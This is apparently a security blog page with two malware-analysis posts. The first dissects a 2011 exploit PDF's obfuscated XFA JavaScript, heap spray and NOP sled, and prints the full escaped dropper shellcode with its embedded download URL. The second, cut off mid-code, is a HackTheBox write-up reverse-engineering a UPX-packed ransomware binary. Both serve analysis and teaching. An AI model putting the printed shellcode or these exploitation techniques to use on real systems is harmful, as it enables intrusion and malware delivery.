Code|Beta

Analyzing PDF Malware

Thu, 01 Jan 2026 17:21:24 +0000

Portable Document Format (PDF) files can contain JavaScript code and embed other files. Malware authors often abuse these features to spread malware; however, whether an attack succeeds depends on the application used to view the document, as different PDF viewers handle embedded content and JavaScript differently.

The malicious document analyzed in this post leverages a vulnerability in a specific PDF viewing application to achieve code execution. As a result, not all victims who open this PDF file will trigger the malicious behavior.

Sample Overview

Initial analysis focuses on information that can be obtained from a file without dissecting the sample, with the goal of answering a basic question: what is this?

The file has been observed under several names; for this post, the name kissasszod.pdf (SHA256 4a65b640318c8cc4ce906a7d03ca78b33b21dedaad3a787d32ffadbb955dee22) is used. The file is 10,799 bytes (~11 KB) in size and contains a malicious payload that is executed when the file is opened by a vulnerable PDF reader.

This is an older malware sample, originally submitted to VirusTotal in 2011, but it remains a useful example of PDF-based exploitation techniques for those learning to analyze malicious documents.

The file is confirmed to be a PDF document, as shown in the screenshot below. The exiftool output also reports a warning about the cross-reference table (xref).

The PDF targets version 1.6 of the specification, which was released in 2004 and was already outdated by the time the sample was first submitted to VirusTotal, since version 1.7 was released in 2006.

As part of the initial triage, the pdfinfo tool was used to identify high-level document characteristics without parsing the embedded objects. Metadata fields such as the title, subject, author, and creator contain strings that don't make sense, a common aspect of malicious documents that were created with a tool or modified to avoid attribution.

The creation timestamp predates the submission to VirusTotal, suggesting the document may have been distributed for several months before it was properly detected, or that it was part of a broader campaign.

While the output reports that no JavaScript is present, this only means that the sample has no traditional document-level JavaScript; it does not exclude the possibility of code being embedded elsewhere in the file. Additionally, the existence of an XFA form is relevant, as this feature has been abused by malware authors due to inconsistent handling across PDF readers and its expanded attack surface.

Based on this initial triage, further investigation is needed, with a focus on the XFA form and the document content.

PDF Structure Analysis

While there are tools that automate aspects of PDF analysis, such as peepdf, this section takes a manual approach, walking through the PDF structure to understand how the document is organized and to identify components that may be responsible for malicious behavior.

PDF readers begin processing a document by locating the trailer dictionary, which is normally found near the end of the file. This element serves a function similar to a table of contents, as it provides references to several components of the document, including the root object and cross-reference (xref) information. The command sed -n '/^trailer/,/^>>/p' kissasszod.pdf can be used to extract the trailer dictionary from the file for closer inspection.

The output shows that the root element is located at object 18, as indicated by the /Root 18 0 R entry. This entry points to the document catalog, which allows the reader to locate the objects that define the document's layout and behavior.
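The same lookup can be sketched in Python. This is a minimal illustration, assuming the file uses a classic uncompressed trailer dictionary rather than a cross-reference stream; the function name find_root_ref and the sample bytes are hypothetical and not taken from the sample.

```python
import re

def find_root_ref(pdf_bytes: bytes):
    """Return (object number, generation) of the /Root entry, or None."""
    # Use the last "trailer" keyword, since incremental updates append new trailers.
    pos = pdf_bytes.rfind(b"trailer")
    if pos == -1:
        return None
    match = re.search(rb"/Root\s+(\d+)\s+(\d+)\s+R", pdf_bytes[pos:])
    if match is None:
        return None
    return int(match.group(1)), int(match.group(2))

# Hypothetical trailer, shaped like the one described above.
sample = b"trailer\n<<\n/Size 19\n/Root 18 0 R\n>>\nstartxref\n1234\n%%EOF\n"
print(find_root_ref(sample))
```

To try it on a real file, pass the result of open("kissasszod.pdf", "rb").read() instead of the sample bytes.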

Objects in a PDF document follow a basic structure, shown below:

X Y obj
<<
[..data..]
>>
endobj

In this structure, X represents the object number, while Y represents the generation number. The generation number allows multiple versions of an object to exist, which allows a document to be updated incrementally; however, it is more common to see a single version of an object, with the generation number set to 0.

Understanding this structure makes it straightforward to extract the root object from the sample using the command sed -n '/^18 0 obj/,/^endobj/p' kissasszod.pdf.
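For readers who prefer a script over sed, the extraction can be approximated as follows. This is a sketch, assuming each object header and endobj keyword starts at the beginning of a line terminated by a newline (the same assumption the sed expression makes); extract_object and the sample bytes are hypothetical.

```python
import re

def extract_object(pdf_bytes: bytes, number: int, generation: int = 0):
    """Return the raw bytes of 'N G obj ... endobj', or None if absent."""
    # ^ is anchored to line starts, so object 8 does not match inside "18 0 obj".
    pattern = rb"^%d %d obj\b.*?^endobj" % (number, generation)
    match = re.search(pattern, pdf_bytes, re.DOTALL | re.MULTILINE)
    return match.group(0) if match else None

# Hypothetical two-object document used only to exercise the function.
sample = (
    b"17 0 obj\n<< /XFA [] >>\nendobj\n"
    b"18 0 obj\n<<\n/Type /Catalog\n/Pages 2 0 R\n>>\nendobj\n"
)
print(extract_object(sample, 18).decode("latin-1"))
```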

The /Type /Catalog entry confirms that this object is the catalog, and therefore the entry point for the PDF. The /Pages 2 0 R entry references the object that contains the page tree. That object frequently references streams, forms, or annotations, which means that malicious content may be reached indirectly from here.

The /AcroForm entry is notable, since it indicates the presence of interactive form elements, an area that has often been abused to carry malicious code when combined with XFA-based content.

Object 17 can be extracted for analysis using the command sed -n '/^17 0 obj/,/^endobj/p' kissasszod.pdf.

The presence of the XML Forms Architecture (XFA) entry is significant. Rather than relying on a single stream, it holds multiple references: there are 8 indirect references that can be examined.
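Listing the indirect references in an object is a simple pattern match on the "N G R" form. The snippet below is a sketch; the function name indirect_refs is hypothetical, and the /XFA array in the sample is illustrative rather than copied from the document.

```python
import re

def indirect_refs(obj_bytes: bytes):
    """Return the object numbers of every 'N G R' reference, in order."""
    return [int(num) for num, _gen in re.findall(rb"(\d+)\s+(\d+)\s+R\b", obj_bytes)]

# Hypothetical object body; packet names and numbers are placeholders.
sample = b"17 0 obj\n<< /XFA [(template) 8 0 R (datasets) 10 0 R] >>\nendobj\n"
print(indirect_refs(sample))
```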

The following command can be used to look through all of these objects at once:

awk '
/^(6|7|8|9|1[0-3]) 0 obj/ {flag=1}
flag {print}
/^endobj/ {flag=0}
' kissasszod.pdf

The results show several referenced objects, with two standing out due to their larger size and the presence of data that does not appear to be normal.

The command sed -En '/^(8|10) 0 obj/,/^endobj/p' kissasszod.pdf can be used to focus on these two objects.

Placing special attention on the stream sections of these objects reveals XML content, with one of the objects containing JavaScript that appears to be obfuscated.

Obfuscated JavaScript Analysis

The following command can be used to extract the JavaScript code from object 8:

sed -n '/^8 0 obj/,/^endobj/p' kissasszod.pdf | sed -n '/^stream/,/^endstream/{/^stream/d;/^endstream/d;p}' | xmllint --xpath '//*[local-name()="script"]/text()' - | js-beautify

The command uses the xmllint and js-beautify utilities to extract the JavaScript code from the XML stream and display it in a more readable format.
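The XPath step can also be reproduced with Python's standard library. This is a sketch under the same assumption as the pipeline above, namely that the stream holds plain (uncompressed) XML; script_texts and the sample XML, including its namespace, are illustrative.

```python
import xml.etree.ElementTree as ET

def script_texts(xml_text: str):
    """Return the text of every <script> element, ignoring XML namespaces."""
    root = ET.fromstring(xml_text)
    texts = []
    for element in root.iter():
        # Namespaced tags look like '{namespace}script'; keep only the local name.
        local_name = element.tag.rsplit("}", 1)[-1]
        if local_name == "script" and element.text:
            texts.append(element.text.strip())
    return texts

# Hypothetical XFA-like fragment, not the content of object 8.
sample = (
    '<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">'
    '<subform><event activity="initialize">'
    '<script contentType="application/x-javascript">var a = 1;</script>'
    '</event></subform></template>'
)
print(script_texts(sample))
```

Matching on the local name mirrors the local-name() test in the xmllint expression, so the namespace of the XFA packet does not need to be known in advance.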

The obfuscation is simple, which makes it straightforward to strip the junk logic and recover a more readable version of the script.

After cleaning up the script and renaming functions and variables for clarity, the recovered JavaScript code is shown below:

The script implements a decoder routine and ends up executing the decoded payload using the eval function. The encoded data is retrieved from an object named khfdskjfh, which doesn't appear within the JavaScript itself. Instead, the value is accessed via khfdskjfh['rawValue'], a pattern that is atypical for standalone JavaScript but consistent with how form field values are stored and accessed within a PDF document through AcroForm handling.

The following command is used to extract the encoded data stored in khfdskjfh, which is located within object 10 of the PDF document:

sed -n '/^10 0 obj/,/^endobj/p' kissasszod.pdf | sed -n '/^stream/,/^endstream/{/^stream/d;/^endstream/d;p}' | xmllint --xpath '//*[local-name()="khfdskjfh"]/text()' -

The resulting output is shown in the screenshot below:

Reviewing the decoder logic, two lines clearly define how the encoded numeric data is split into separate components:

khfdskjfh['rawValue'].substring(0, 50)
khfdskjfh['rawValue'].substring(50)

The first 50 characters are copied to the encoded_table, meaning that they are used to construct the character translation table, while the remaining characters represent the encoded payload that will be decoded and executed. This separation explains why the data stored in khfdskjfh appears as a single large numeric block, despite serving two distinct purposes during execution.
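The split itself is easy to mirror outside the PDF. The sketch below only reproduces the two substring calls; split_raw_value is a hypothetical helper, and the numeric string stands in for the real field value, which is not reproduced here.

```python
def split_raw_value(raw_value: str, table_length: int = 50):
    """Mirror substring(0, 50) and substring(50) from the decoder."""
    return raw_value[:table_length], raw_value[table_length:]

# Hypothetical numeric blob standing in for khfdskjfh['rawValue'].
raw = "0123456789" * 6
encoded_table, encoded_payload = split_raw_value(raw)
print(len(encoded_table), len(encoded_payload))
```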

By formatting the code and removing the call that would execute the decoded payload, the decoding function can be safely run using Node.js to recover the hidden content. The screenshot below shows the second stage of the malicious code:

This second-stage JavaScript code continues with the trend of having simple obfuscation and being quite readable as it is.

The _X function acts as the entry point and contains the primary payload construction logic. Two payload components are handled, each encoded differently: one is Base64-encoded data, while the other is escaped binary data. The Base64 payload is dynamically built and stored in the same AcroForm field (khfdskjfh) that held the encoded second-stage JavaScript. The script does not decode the Base64 string itself; it is presumably consumed by the vulnerable program.

The _DI function is used to identify the version of the PDF reader by querying the viewer version. Based on the detected version, one of two payload variants is used, suggesting compatibility handling for different target environments.

The _R and _M functions are utility routines that expand strings at runtime, which keeps the script small while still allowing large buffers to be constructed as needed. The _R function expands the string QUFB, the Base64-encoded representation of AAA, a filler pattern commonly seen in buffer overflow exploitation. The _M function expands the value 0x9090, which corresponds to two x86 No Operation (NOP) instructions (opcode 0x90); this forms a NOP sled that increases the reliability of redirecting execution flow during exploitation.
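Both values are easy to verify independently. The following check uses only the Python standard library; the repeat count of 4 is arbitrary and chosen for illustration.

```python
import base64
import struct

# "QUFB" is the Base64 encoding of "AAA", so repeating it decodes to a run of 'A' bytes.
assert base64.b64encode(b"AAA") == b"QUFB"
filler = base64.b64decode("QUFB" * 4)
print(filler)

# 0x9090 stored as a 16-bit little-endian value is two 0x90 (NOP) bytes.
nop_pair = struct.pack("<H", 0x9090)
print(nop_pair.hex())
```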

The _L function prepares the shellcode stored in the _ET variable and places it into memory via the _Q array. The shellcode is added to the array repeatedly, some 400 times. This behavior is typical of a heap spray, as it increases the likelihood that the shellcode resides at a predictable memory location when the vulnerability is triggered.

The _L function relies on JavaScript's unescape function to convert the escaped shellcode into its binary representation. Since unescape is deprecated and behaves differently across JavaScript engines, attempting to run the second-stage code directly in Node.js produces invalid shellcode. To avoid this issue, the following Python script is used to accurately reconstruct the binary shellcode.

#!/usr/bin/env python3

import re

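def unescape(escapedBytes, use_unicode=True):
    """Emulate JavaScript's unescape() and return (status, bytes).

    %uXXXX sequences are written as two little-endian bytes; %XX sequences
    and literal characters are written as one byte, followed by a zero byte
    when use_unicode is True (UTF-16LE layout).
    """
    unescaped = bytearray()
    unicodePadding = b'\x00' if use_unicode else b''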
    try:
        lowered = escapedBytes.lower()
        if '%u' in lowered or '\\u' in lowered or '%' in escapedBytes:
            if '\\u' in lowered:
                splitBytes = escapedBytes.split('\\')
            else:
                splitBytes = escapedBytes.split('%')
            for i, splitByte in enumerate(splitBytes):
                if not splitByte:
                    continue
                if (
                    len(splitByte) > 4 and
                    re.match(r'u[0-9a-f]{4}', splitByte[:5], re.IGNORECASE)
                ):
                    unescaped.append(int(splitByte[3:5], 16))
                    unescaped.append(int(splitByte[1:3], 16))
                    for ch in splitByte[5:]:
                        unescaped.extend(ch.encode('latin-1'))
                        unescaped.extend(unicodePadding)
                elif (
                    len(splitByte) > 1 and
                    re.match(r'[0-9a-f]{2}', splitByte[:2], re.IGNORECASE)
                ):
                    unescaped.append(int(splitByte[:2], 16))
                    unescaped.extend(unicodePadding)
                    for ch in splitByte[2:]:
                        unescaped.extend(ch.encode('latin-1'))
                        unescaped.extend(unicodePadding)
                else:
                    if i != 0:
                        unescaped.extend(b'%')
                        unescaped.extend(unicodePadding)
                    for ch in splitByte:
                        unescaped.extend(ch.encode('latin-1'))
                        unescaped.extend(unicodePadding)
        else:
            unescaped.extend(escapedBytes.encode('latin-1'))
    except Exception:
        return (-1, b'Error while unescaping the bytes')
    return (0, bytes(unescaped))

ET = (
    '%u204C%u0F60%u63A5%u4A80%u203C%u0F60%u2196'
    '%u4A80%u1F90%u4A80%u9030%u4A84%u7E7D%u4A80'
    '%u4141%u4141%26%00%00%00%00%00%00%00%u8871'
    '%u4A80%u2064%u0F60%u0400%00%u4141%u4141%u4141'
    '%u4141%u9090%u9090%u9090%u9090%uFBE9%00%u5F00'
    '%uA1640%00%u408B%u8B0C%u1C70%u8BAD%u2068%u7D80'
    '%u330C%u0374%uEB96%u8BF3%u0868%uF78B%u046A%uE859'
    '%8F%00%uF9E2%u6F68n%u6800%u7275%u6D6C%uFF54'
    '%u8B16%uE8E8y%00%uD78B%u8047%3F%uFA75%u5747%u8047'
    '%3F%uFA75%uEF8B%u335F%u81C9%u04EC%01%u8B00%u51DC'
    '%u5352%u0468%01%uFF00%u0C56%u595A%u5251%u028B%u4353'
    '%u3B80%u7500%u81FA%uFC7B%u652E%u6578%u0375%uEB83'
    '%u8908%uC703%u0443%u652E%u6578%u43C6%08%u8A5B%u04C1'
    '%u8830E%uC033%u5050%u5753%uFF50%u1056%uF883%u7500'
    '%u6A06%u5301%u56FF%u5A04%u8359%u04C2%u8041%3A%uB475'
    '%u56FF%u5108%u8B56%u3C75%u748B%u7835%uF503%u8B56'
    '%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238'
    '%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E'
    '%uDD03%u8B66%u4B0C%u5E8B%u031C%u8BDD%u8B04%uC503%u5EAB'
    '%uC359%E8%uFFFF%u8EFF%u0E4E%u98EC%u8AFE%u7E0E%uE2D8'
    '%u3373%u8ACA%u365B%u2F1A%u6F70%u646Ec%u7468%u7074%u2f3a'
    '%u6d2f%u7261%u6e69%u6461%u3361%u632e%u6d6f%u382f%u2f38'
    '%u696d%u7263%u6d6f%u6361%u6968%u656e%u2e73%u6870%u3f70'
    '%u3d65%u2633%u3d6e'
)

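status, data = unescape(ET)
if status != 0:
    # On failure, data holds the error message rather than shellcode.
    raise SystemExit(data.decode())

with open('shellcode.bin', 'wb') as f:
    f.write(data)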
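The byte swap performed for each %uXXXX token (low byte first, then high byte) is what places the shellcode in memory in x86 little-endian order. A small standalone check, using the hypothetical helper decode_percent_u, illustrates the conversion for single tokens:

```python
def decode_percent_u(token: str) -> bytes:
    """Convert one '%uXXXX' token to its two little-endian bytes."""
    if not token.lower().startswith("%u") or len(token) != 6:
        raise ValueError("expected a token of the form %uXXXX")
    code_unit = int(token[2:], 16)
    return code_unit.to_bytes(2, "little")

print(decode_percent_u("%u204C").hex())
print(decode_percent_u("%u9090").hex())
```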

The binary file is shown below. Without going further, a URL is visible at the end of the code. This shellcode functions as a dropper, retrieving additional stages of the malware from the referenced domain. From an investigation standpoint, this indicator would be used to determine whether the domain was accessed by any endpoint.
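Pulling printable strings out of the binary can be automated in the spirit of the strings utility. The sketch below is one way to do it; ascii_strings and find_urls are hypothetical helpers, the minimum length of 8 is an arbitrary choice, and the sample bytes are a stand-in rather than the real shellcode.

```python
import re

def ascii_strings(data: bytes, min_length: int = 8):
    """Return runs of printable ASCII at least min_length bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_length
    return [m.decode("ascii") for m in re.findall(pattern, data)]

def find_urls(data: bytes):
    """Keep the part of each printable run that starts at an http(s) URL."""
    urls = []
    for text in ascii_strings(data):
        start = text.find("http")
        if start != -1 and "://" in text[start:]:
            urls.append(text[start:])
    return urls

# Hypothetical bytes standing in for the contents of shellcode.bin.
sample = b"\x90\x90\xeb\x10\x00http://example.invalid/stage2?id=\x00"
print(find_urls(sample))
```

For the real file, the input would be open("shellcode.bin", "rb").read().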

Because this is an older sample, first seen roughly 15 years ago, the infrastructure and the vulnerability used by the malware are no longer active. As a result, further investigation of the later stages is not possible.

Regardless, the sample remains a valuable case study. The analysis shows practical techniques for triaging and dissecting malicious PDF documents, including identifying embedded JavaScript, navigating PDF structure, and safely extracting and interpreting exploit code. These techniques remain relevant today, as many modern malicious documents continue to rely on the same fundamental concepts, even when the tools and delivery methods have evolved.

References

VirusTotal. (2011, February 7). kissasszod.pdf [Malware analysis report]. https://www.virustotal.com/gui/file/4a65b640318c8cc4ce906a7d03ca78b33b21dedaad3a787d32ffadbb955dee22
Esparza, J. (2011, November 14). Analysis of a malicious PDF from a SEO sploit pack. Eternal Todo. https://eternal-todo.com/blog/seo-sploit-pack-pdf-analysis
Wikipedia contributors. (2025, October 15). History of PDF. In Wikipedia, The Free Encyclopedia. Retrieved 21:31, December 27, 2025, from https://en.wikipedia.org/w/index.php?title=History_of_PDF&oldid=1316915536

HTB Sherlocks: Lockpick 2

Mon, 17 Jun 2024 01:51:06 +0000

The Lockpick 2 challenge is part of the HackTheBox Sherlocks defensive security scenarios. This challenge is now retired and available to VIP members.

The challenge description mentions that the organization was hit by ransomware that managed to encrypt a large number of files. The organization has a policy of not paying ransoms, so the captured sample needs to be analyzed to determine whether the files can be decrypted.

This write-up uses static analysis of the files, and Radare2 for the analysis of the binary.

The provided ZIP archive contains several encrypted files with the extension 24bes, the ransom note, a DANGER.txt note, and another ZIP archive that contains the binary sample to be analyzed. Below is the structure of the ZIP archive for the challenge.

lockpick2.0
├── DANGER.txt
├── malware.zip
└── share
    ├── countdown.txt
    ├── expanding-horizons.pdf.24bes
    └── takeover.docx.24bes

For documentation purposes, hashes of the files are collected.

452c3328667b7242132bf0821c9d4424  ./lockpick2.0/share/takeover.docx.24bes
425d610faab2eb49d5aec7f37de59484  ./lockpick2.0/share/expanding-horizons.pdf.24bes
e2edc252b5776a1e9c63c58b5328ae3a  ./lockpick2.0/share/countdown.txt
62c05b0f64aa0bd8419c30216b2f106d  ./lockpick2.0/DANGER.txt
bee5debabd4ab24a5d844f8bc0562e33  ./lockpick2.0/malware.zip
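A listing like the one above can also be produced with a few lines of Python. This is a sketch; md5_of_file and hash_tree are hypothetical helper names. MD5 is used here only to match the listing; for identification purposes SHA-256 is generally the safer choice.

```python
import hashlib
from pathlib import Path

def md5_of_file(path, chunk_size: int = 65536) -> str:
    """Hash a file in chunks so large files are not read into memory at once."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def hash_tree(root):
    """Yield (md5, path) for every regular file under root."""
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            yield md5_of_file(path), str(path)

if __name__ == "__main__":
    for checksum, name in hash_tree("lockpick2.0"):
        print(f"{checksum}  {name}")
```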

The DANGER.txt file is a note to the analyst, providing some analysis instructions and the password for the ZIP archive that contains the binary sample.

Let us analyze the files within the share directory.

The countdown.txt file is the ransom note left by the ransomware. It contains a BTC address and an Onion address that can be used to reach out to the threat actors.

The BTC address can be checked through a blockchain tracker. This is outside of the scope of this analysis, so we'll just make a note of the information as indicators of compromise (IoC).

The Onion address is also documented as an IoC, and any monitoring tools used within the organization should be checked for connection attempts to this address.

The file utility identifies the files with the 24bes extension only as data:

$ file -k expanding-horizons.pdf.24bes takeover.docx.24bes
expanding-horizons.pdf.24bes: data
takeover.docx.24bes:          data

This is expected since the data is encrypted. It can be further confirmed by checking the initial bytes of each file with a hex editor or a hex dump tool such as xxd:

$ xxd -l 64 expanding-horizons.pdf.24bes
00000000: 0109 8fec f14f 7659 16bf ee41 7d13 1624  .....OvY...A}..$
00000010: 2175 87e4 9f7f ca99 db8b ab7f b13f 6370  !u...........?cp
00000020: 0517 0432 99d4 ed8f 494b 24c1 5e89 21b0  ...2....IK$.^.!.
00000030: 8ec5 74d3 e96a 80c8 389b 6c05 7f6a c0ef  ..t..j..8.l..j..

$ xxd -l 64 takeover.docx.24bes
00000000: 16b1 2ad0 2a87 38a4 7a5b 9e59 5b3a 8801  ..*.*.8.z[.Y[:..
00000010: 2daf 1eae bf01 5b06 5a3f b4f6 ef5c 4c00  -.....[.Z?...\L.
00000020: 1930 282b 1028 9553 ebaf ffbd 4118 9e86  .0(+.(.S....A...
00000030: 7c7b 70c3 102b f249 cd9e c0ec a7df 88f1  |{p..+.I........

There are no recognizable magic bytes in either file. At this point there is nothing else to learn from these files.
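A complementary check is to measure the byte entropy of the files, since encrypted (or compressed) data tends to sit close to 8 bits per byte. The function below is a minimal sketch; shannon_entropy is a hypothetical helper name and the inputs shown are synthetic.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    # Sum p * log2(1/p) over the byte values that actually occur.
    return sum((n / total) * math.log2(total / n) for n in counts.values())

print(shannon_entropy(b"A" * 64))          # a single repeated byte value
print(shannon_entropy(bytes(range(256))))  # every byte value exactly once
```

High entropy alone does not distinguish encryption from compression, so it supports the conclusion above rather than proving it.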

Initial Analysis of update

The binary sample in the ZIP archive is named update. The first step after extracting the file is to generate its hash:

$ md5sum update
8b2d4bc2f26d76c1a900e53483731013  update

The hash is then checked against malware analysis services, such as VirusTotal, to determine whether the sample has been submitted previously or whether it may be new or targeted malware. VirusTotal shows that 33 out of 65 providers have tagged this binary as malicious, which supports the suspicion that this is the ransomware.

The tags for this entry show that the binary is packed with UPX, a common packer that threat actors also use to obfuscate their malware and complicate analysis.

Let us further analyze this binary to determine how it encrypts the data.

The binary file is loaded into Detect It Easy to confirm the packer being used. There are several ways to confirm this; further information can be found in the post Analyzing Packed Binaries.
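One quick, tool-independent heuristic is to search the file for the "UPX!" marker that UPX normally leaves in packed binaries. The snippet is a sketch; looks_upx_packed is a hypothetical helper and the byte strings are synthetic. The marker can be stripped or altered, so its absence does not prove that a binary is unpacked.

```python
def looks_upx_packed(data: bytes) -> bool:
    """Heuristic: UPX normally leaves a 'UPX!' marker in packed files."""
    return b"UPX!" in data

# Hypothetical bytes; in practice read the file, e.g. open("update", "rb").read().
packed_like = b"\x7fELF" + b"\x00" * 32 + b"UPX!" + b"\x00" * 8
plain_like = b"\x7fELF" + b"\x00" * 44
print(looks_upx_packed(packed_like), looks_upx_packed(plain_like))
```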

The packed binary can be unpacked with UPX using the following command:

./upx -d -o update.elf update

The unpacked binary is saved to disk with the filename update.elf, and it can now be analyzed through reverse engineering. The binary is loaded into Radare2 for this purpose:

$ r2 update.elf
[0x00001280]> aaaa
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze imports (af@@@i)
INFO: Analyze entrypoint (af@ entry0)
INFO: Analyze symbols (af@@@s)
INFO: Analyze all functions arguments/locals (afva@@@F)
INFO: Analyze function calls (aac)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Analyzing methods (af @@ method.*)
INFO: Recovering local variables (afva@@@F)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Scanning for strings constructed in code (/azs)
INFO: Finding function preludes (aap)
INFO: Enable anal.types.constraint for experimental type propagation
[0x00001280]>

After loading the binary in r2, the aaaa command analyzes the binary to identify the different parts that make up the program. One of the first things to check is the strings, which is done with the iz command:

[0x00001280]> iz
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00003010 0x00003010 5   6    .rodata ascii \nCLIG
1   0x00003030 0x00003030 5   6    .rodata ascii \nCLIG
2   0x00003050 0x00003050 5   6    .rodata ascii \nCLIG
3   0x00003070 0x00003070 5   6    .rodata ascii \nCLIG
4   0x00003090 0x00003090 5   6    .rodata ascii \nCLIG
5   0x000030a3 0x000030a3 18  19   .rodata ascii b7894532snsmajuys6
6   0x000030b8 0x000030b8 31  32   .rodata ascii curl_easy_perform() failed: %s\n
7   0x000030d8 0x000030d8 31  32   .rodata ascii Could not open output file: %s\n
8   0x000030f8 0x000030f8 4   5    .rodata ascii .txt
9   0x000030fd 0x000030fd 4   5    .rodata ascii .pdf
10  0x00003102 0x00003102 4   5    .rodata ascii .sql
11  0x0000310b 0x0000310b 5   6    .rodata ascii .docx
12  0x00003111 0x00003111 5   6    .rodata ascii .xlsx
13  0x00003117 0x00003117 5   6    .rodata ascii .pptx
14  0x0000311d 0x0000311d 4   5    .rodata ascii .zip
15  0x00003122 0x00003122 4   5    .rodata ascii .tar
16  0x00003127 0x00003127 7   8    .rodata ascii .tar.gz
17  0x0000312f 0x0000312f 13  14   .rodata ascii countdown.txt
18  0x0000313d 0x0000313d 7   8    .rodata ascii /share/
19  0x00003145 0x00003145 15  16   .rodata ascii Update failed.\n
20  0x00003158 0x00003158 40  41   .rodata ascii Running update, testing update endpoints
21  0x00003181 0x00003181 11  12   .rodata ascii Updating %s
22  0x0000318d 0x0000318d 11  12   .rodata ascii  Successful
23  0x000031a0 0x000031a0 46  47   .rodata ascii Update complete - thank you for your patience.
24  0x000031cf 0x000031cf 16  17   .rodata ascii %s/countdown.txt
25  0x000031e0 0x000031e0 32  33   .rodata ascii https://pastes.io/raw/foiawsmlsk
26  0x00003201 0x00003201 5   6    .rodata ascii %s/%s
27  0x00003210 0x00003210 30  31   .rodata ascii Could not open input file: %s\n
28  0x0000322f 0x0000322f 8   9    .rodata ascii %s.24bes
29  0x00003240 0x00003240 39  40   .rodata ascii Failed to delete the original file: %s\n

Let's analyze the strings that are shown here:

The strings show several extensions that likely indicate the file types that the ransomware targets.
There are also 2 strings that contain the filename of the ransom note that was included in the ZIP archive.
The /share/ path is mentioned, which may correspond to the share directory that was included in the ZIP archive.
The extension 24bes is also mentioned.
The URL https://pastes.io/raw/foiawsmlsk needs to be investigated further.
There are other strings that are status or error messages, as well as some that may be either encrypted or encoded.

Checking the URL shows that the ransom note is stored there. This allows the threat actor to modify the note without having to release new malware.

There's not much else to go on with the strings, so let's now look at the libraries that are used by the ransomware. The command il shows the linked libraries.

[0x00001280]> il
[Linked libraries]
libcrypto.so.3
libcurl.so.4
libc.so.6

3 libraries

The libraries that are imported give an idea of the functionality that this ransomware has, keeping in mind that it is possible that the malware loads additional libraries dynamically during execution.

Based on these libraries, the following can be determined:

The libcrypto library provides the encryption capabilities, which is expected for ransomware.
The libcurl library is used to download and upload data through various protocols.

Based on the information that is known up to this point, libcurl appears to be used to obtain the ransom note from the URL that was found in the strings. However, it is still unknown how the encryption happens or what key is used, so further analysis of the functions is needed.

Analyzing the Functions

Let's first focus on the functions that the binary imports from these libraries. The ii command lists them, and the output from Radare2 shows the name of each function:

[0x00001280]> ii
[Imports]
nth vaddr      bind   type   lib name
―――――――――――――――――――――――――――――――――――――
1   0x00001030 GLOBAL FUNC       printf
2   0x00001040 GLOBAL FUNC       EVP_EncryptUpdate
3   0x00001050 GLOBAL FUNC       curl_global_init
4   0x00001060 GLOBAL FUNC       curl_global_cleanup
5   0x00001070 GLOBAL FUNC       strlen
6   0x00001080 GLOBAL FUNC       OPENSSL_init_crypto
7   0x00001090 GLOBAL FUNC       ERR_print_errors_fp
8   0x000010a0 GLOBAL FUNC       abort
9   0x000010b0 GLOBAL FUNC       EVP_EncryptInit_ex
10  0x000010c0 GLOBAL FUNC       EVP_aes_256_cbc
11  0x000010d0 GLOBAL FUNC       EVP_CIPHER_CTX_new
12  ---------- GLOBAL FUNC       __libc_start_main
13  0x000010e0 GLOBAL FUNC       sleep
14  0x000010f0 GLOBAL FUNC       memcpy
15  0x00001100 GLOBAL FUNC       stat
16  0x00001110 GLOBAL FUNC       fclose
17  0x00001120 GLOBAL FUNC       EVP_CIPHER_CTX_free
18  0x00001130 GLOBAL FUNC       strrchr
19  0x00001140 GLOBAL FUNC       curl_easy_setopt
20  0x00001150 GLOBAL FUNC       fflush
21  0x00001160 GLOBAL FUNC       fopen
22  0x00001170 GLOBAL FUNC       curl_easy_cleanup
23  0x00001180 GLOBAL FUNC       curl_easy_init
24  0x00001190 GLOBAL FUNC       curl_easy_perform
25  0x000011a0 GLOBAL FUNC       putchar
26  0x000011b0 GLOBAL FUNC       strcmp
27  0x000011c0 GLOBAL FUNC       fprintf
28  0x000011d0 GLOBAL FUNC       curl_easy_strerror
29  0x000011e0 GLOBAL FUNC       fread
30  0x000011f0 GLOBAL FUNC       opendir
31  0x00001200 GLOBAL FUNC       readdir
32  0x00001210 GLOBAL FUNC       puts
33  0x00001220 GLOBAL FUNC       EVP_EncryptFinal_ex
34  0x00001230 GLOBAL FUNC       snprintf
35  0x00001240 GLOBAL FUNC       closedir
36  ---------- WEAK   NOTYPE     _ITM_deregisterTMCloneTable
37  0x00001250 GLOBAL FUNC       remove
38  ---------- WEAK   NOTYPE     __gmon_start__
39  ---------- WEAK   NOTYPE     _ITM_registerTMCloneTable
40  0x00001260 GLOBAL FUNC       fwrite
42  0x00001270 WEAK   FUNC       __cxa_finalize

Several functions stand out and provide relevant information:

The EVP_aes_256_cbc (0x10c0) function indicates the encryption algorithm used by the ransomware: AES with a 256-bit key in CBC mode.
There are several file handling functions, which is expected.
The cURL functions are expected, but the most relevant one is curl_easy_perform (0x1190), since it is the one that performs the transfer.
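Knowing that AES in CBC mode is involved gives a quick sanity check for encrypted files: AES works on 16-byte blocks, so CBC output is a multiple of 16 bytes. The sketch below assumes OpenSSL's default padding is left enabled and that the ransomware writes only ciphertext to the output file; neither assumption has been confirmed at this point in the analysis, and both helper names are hypothetical.

```python
AES_BLOCK_SIZE = 16  # bytes; fixed for AES regardless of key size

def cbc_padded_length(plaintext_length: int) -> int:
    """Ciphertext length for CBC with PKCS#7 padding, which adds 1 to 16 bytes."""
    return (plaintext_length // AES_BLOCK_SIZE + 1) * AES_BLOCK_SIZE

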